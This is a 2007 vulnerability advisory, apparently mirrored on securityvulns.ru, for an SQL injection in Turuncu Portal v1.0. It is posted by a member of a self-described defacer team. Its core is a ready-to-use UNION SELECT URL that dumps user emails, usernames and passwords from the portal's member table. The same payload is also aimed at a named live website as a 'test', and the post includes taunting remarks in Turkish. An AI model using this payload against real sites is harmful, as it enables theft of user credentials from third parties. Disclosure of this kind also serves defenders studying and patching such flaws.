Security Advisory: Turuncu Portal v1.0 == SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Meganoide's news v1.1.1 < = RFi Vulnerabilities
  Dem_trac acces to log file wihtout authentification
  CedStat v1.31 XSS
  Vulnerabilities в WordPress 2.0

From: chernobiLe <chernobile_(at)_gmail.com>
Date: 16.02.2007
Subject: Turuncu Portal v1.0 == SQL Injection Vulnerability

###############################################################
#Turuncu Portal v1.0 == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org, www.chernobiLe.net<http://www.chernobile.net/>
#Contact: info@cyber-sabotage.org
#Not;
#Bana Türk Scriptinde Açýk Buluyorsun diyen eleman; akýllý ol sen bana Türk
scriptidir
#yapma dedin eywallah dedim. Artislik yapmak için kendini küçük düþürüp
lamerlik yaptýn.
#AYTdeki deðerli dostlarým için konuyu uzatmýyorum. Karþýma çýkmayýn
###############################################################
#Risk : High
#Download Link Of Turuncu Portal v1.0 :
http://aspindir.com/indir.asp?ID=4714 OR

http://www.aspdunyasi.net/download_goster.asp?ITEM_ID=56
#Exploit;
#Username, Passport, Mail;
http://[SITE]/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,
4+from+uyeler<http://[site]/h_goster.asp?id=1+union+select+0,MsEmail,
MsUserName,MsPassword,4+from+uyeler>

#Union data Text;
#Baþlýk : USERNAME
#Blank : MAIL
#Yazar : PASSWORD

#Test :
http://www.aspdunyasi.net/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,
MsPassword,4+from+uyeler

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM